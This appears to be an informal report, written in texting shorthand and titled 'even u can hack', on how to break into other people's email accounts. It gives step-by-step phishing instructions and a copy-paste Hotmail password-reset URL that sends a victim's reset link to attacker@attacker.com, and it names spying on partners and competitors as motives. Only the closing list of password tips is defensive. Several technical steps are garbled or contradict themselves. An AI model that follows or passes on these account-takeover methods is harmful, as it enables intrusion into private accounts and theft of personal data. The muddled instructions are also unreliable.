“E-MAIL HACKING”… EVEN U CAN HACK

A RESEARCH REPORT BY ASHISH KUMAR

SOURCE : ANKIT FADIA`S DISTANCE EDU. OF N/W SECURITY

Hacking e-mail accounts, stealing sensitive data, copying the address book,
intercepting data, virus infections, password attacks, spoofed messages, abusive e-
mails, Trojan attacks & espionage are some of the many concerns that have started
affecting e-mail users worldwide. E-mails are also commonly being exploited by
computer criminals to execute privacy & identity attacks on unsuspecting victims.
What wud u do if sumbdy broke into ur e-mail a/c & stole all ur sensitive data? wt
wud u do if sumbdy spoofed ur identity & sent e-mails from ur a/c? Wt wud u do if u
received abusive mails on ur a/c?wt wud u do if sum1 broke into ur e-mail a/c & used
it to transfer funds frm ur bank a/c?
Your e-mail a/c has become more dangerous thn any1 evr imagined! E-mail hacking
or rather cracking e-mail a/c”s is 1 of the most common attacks on the internet. The
hugely critical role played by e-mail in 2dyas world makes e-mail cracking all the
more attractive frm criminal’s point of view. A no. of computer crime investigations
also require police & forensic agencies to covertly break into the suspects e-mail
a/c”s to gather evidence.
Possessive young lover’s wud do anythn 2 b able 2 get a glance of their partner’s e-
mail a/c contents. Friends across educational instituitions & org. wud love 2 break
each others e-mail a/c simply 4 fun n jokes. In this age of corporate espionage, many
org. strive 2 break into their competitors e-mail a/c to gather as much business
intelligence as possible.
e-mail a/c cracking or e-mail hacking is indeed 1 of the most exciting & sought after
attacks through internet. Though many industry veterans consider such attacks
merely lame. Although thr is no particular guaranteed method of breaking into
victims e-mail a/c, thr are definitely a few different techniques tat r commonly used
by attackers, namely:
1)Password Guessing
2) ”Forgot Password” attacks
3)Brute Force Password cracking
4)Phishing attacks
5)Input Validation attacks
6)Social Engineering

The detailed discussion of these techniques is elaborated as below:

 …Ashish
report…

1.PASSWORD GUESSING:

 LOW THREAT LEVEL

 EASILY EXECUTED
 VERY COMMON, BUT NT V. EFFECTIVE

Even though the success rate of such attacks is v low, password guessing is probably
1 of the most commonly used pswd cracking techniques prevalent on the Internet. In
this attack, the attacker 1st gathers as much personal information about the victim as
possible (like his phn no., birthday, parents name,girlfriends name, pets name etc.) &
thn simply tries his luck by entering different combinations (of names & nos.) using
hit & trail method at password prompt. If attacker is lucky, thn 1 such random
combinations might actually work. Some of the most common passwords that an
attacker usually guesses are:
1. Loved ones name + Birthday/phn no. for ex. , Jiya18
2. Victims own name + Birthday/phn no. for ex. , vineetjain1
 …Ashish
report…
2.“FORGOT PASSWORD” ATTACK:

 MID THREAT LEVEL

 EAISLY EXECUTED
 NOT VERY EFFECTIVE

The “Forgot Password” attack can definitely b labeled as an extension 2 the pswd
guessing attack. All e-mail service providers have an option that allows users to reset
or retrieve their e-mail a/c pswd by answering a few predefined questions. Ideally, e-
mail service provider’s shud ask users to enter only personal info 2 retrieve or reset
the forgotten password. An attacker can easily find out info such as zip postal code,
birth date, city, etc. & reset the victims pswd using the “Forgot Password” option &
thn gain access to the victims e-mail a/c.
For ex. Yahoo requires users 2 enter only their b.day, zip code & country 2 reset the
e-mail a/c pswd. This info is so public that so many ppl can have access to it & easily
reset the victim’s e-mail a/c pswd:
On the other hand, Hotmail requires users to enter the above info, but it only asks
users 2 answer a secret hint ques.:
 …Ashish
report…

3.BRUTE FORCE PASSWORD ATTACK:

 HIGH THREAT LEVEL

 VERY TEDIOUS & SLOW
 VERY EFFETIVE

Brute force is probably 1 of the oldest techniques of pswd cracking known 2 the
underground community. For most attackers, brute force pswd cracking remains the
ultimate fallback attack if all other techniques fail. In this attack, an automatic tool or
script tries all possible combinations of available keyboard keys as the victim’s pswd.
Such a hit & trial method of trying out all available permutations & combinations
means that irrespective of the victims pswd, it will sooner or later definitely be
cracked. As soon as the correct pswd is found, it is immediately displayed on the
screen. Obviously due to the extremely high no. of possible combinations of
keystrokes, brute force can sometimes take an extremely long time 2 reach the
correct pswd. However, if an attacker is lucky, then this techniques will reveal the
correct pswd within a matter of seconds.
The success & speed of this method largely depends upon the strength of victim’s
pswd & level of algorithm designed by the attacker. Currently I am working on code
generation for function keys- all possible permutations & combinations.
 …Ashish
report…
4.PHISHING:

 VERY HIGH THREAT LEVEL

 EASILY EXECUTED
 MORE OR LESS EFFECTIVE

If 1 has used his e-mail a/c long enough, the chances are that he has often been
timed out, wherein his connection with the e-mail service provider times out & he is
asked to login again. The most natural reaction to this prompt for most e-mail users
across the globe is 2 re-enter their username & pswd info & continue surfing their e-
mail contents. Phishing is a technique that exploits this very tendency of the majority
of e-mail users.
Phishing is a tech in which the attacker creates a fake timed out screen or re-login
screen or error screen & sends it 2 the victim hoping that he gets fooled into entering
the a/c username & pswd. This a/c info reaches the attacker using a script, which the
user is redirected to the homepage of the email service provider. In the most
Phishing attacks, the fake screens that are used 2 fool the victim are extremely
accurate & look v. real.
Most e-mail users do not remain v alert while checking their e-mail & are susceptible
2 such Phishing attacks. Phishing attacks can be executed by following steps:

1. Attacker creates a fake screen that will be used to fool the victim. Usually
such fake Phishing screens can easily be created by editing the HTML code
from the respective e-mail service providers website. It is imp. 2 note that
attackers need 2 change the fake screen adequately 2 ensure that the a/c info
gets sent 2 thm instead of being sent to the attacker. This again can be done
with some basic knowledge of HTML.
For ex. While creating the fake Phishing screen for hotmail, the attacker
needs 2 change the ACTION field in the FORM tag & enter the victims
e-mail address:

2. Once the attacker has created the fake Phishing screen. It has 2 be
sent 2 the victim. The most common techniques that are used 2 send fake
screen to the victim are through file attachments, HTML embedded e-mails,
Active-X enabled e-mails, HTA applications, physical access & many others.

3. Typically, as soon as the victim opens the fake screen, something like wt is
shown below is displayed on the screen. More often then not users think that
this screen has been sent by the authentic e-mail service provider & simply
enter their correct a/c info. As soon as the victim clicks on the LOGIN or SIGN
IN button, this sensitive a/c info gets sent to the attacker.

The Yahoo fake login & Hotmail timed out screens are shown as below:
 …Ashish
report…

5.INPUT VALIDATION ATTACKS:

 VERY HIGH THREAT LEVEL

 EASILY EXECUTED. NOT SO COMMON
 VERY EFFECTIVE

A no. of web-based e-mail service providers on the Internet are vulnerable to input
validation attacks. Such input validation attacks can be used by computer criminals
to gain illegitimate access to e-mail a/c”s.
One of the biggest & most dangerous input validation attacks exited in Microsoft
Corporations Hotmail & was known as the “ Reset Password Input Validation” attack.
This attack allowed an attacker to illegitimately reset the pswd of absolutely any
Hotmail e-mail a/c holder without any proper authorization. This input validation
loophole cud easily be exploited to change the existing pswd of all hotmail users
without any kind of info gathering & without even answering any secret hint
question.
This attack can be easily executed in the following steps:

1. Open your favorite Internet browser like Internet Explorer, opera, Mozilla or
others.
2. Copy & paste the under mentioned URL into the address bar of the browser:

https://register.passport.net
e-mailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem
=attacker@attacker.com&rst=1

Where:
victim@hotmail.com represents the e-mail address of the
victim whose pswd has 2 b changed or reset.
attacker@attacker.com represents the e-mail address of the
attacker where the link to a page that allows the victims pswd
to be changed & sent.
3. Simply press enter & e-mail will be sent to the attackers e-mail address
(attacker@attacker.com) that will allow the attacker to change the victim’s
pswd without entering any authorization.
The Hotmail input validation attack is a typical ex of an attack that allows the
attacker access to a sensitive file or script without the necessary authentication. In
this case, even an unauthorized attacker is allowed to access the Hotmail reset pswd
script. Like most other input validation attacks, even this vulnerability is also a result
of poor programming practices.

…Ashish
report…
6. SOCIAL ENGINEERING:

 MID THREAT LEVEL

 EASE OF EXECUTION VARIES
 EFFECTIVENESS VARIES

Social engineering is the art of taking to ppl in a persuasive & smooth manner in
order to win their trust & then being able to make them reveal certain imp. Bits of
private info. An extremely large no. of pswd cracking attacks on the Internet are
executed using social engineering techiniques.

COUNTER MEASURES:

• Try to use combinations of alphabets, nos. & special

characters.
• Try to use both uppercase & lowercases.
• Try to choose a pswd that is not a word in the dictionary.
• The pswd shud not be too short.
• Keep changing ur pswd frequently.
• Do not use pswd that can easily be guessed like phn nos.
b.dates etc.
• Do not write down ur pswds & store it near ur computer.
• Do not use same pswd for all ur a/c”s
 …Ashish
report…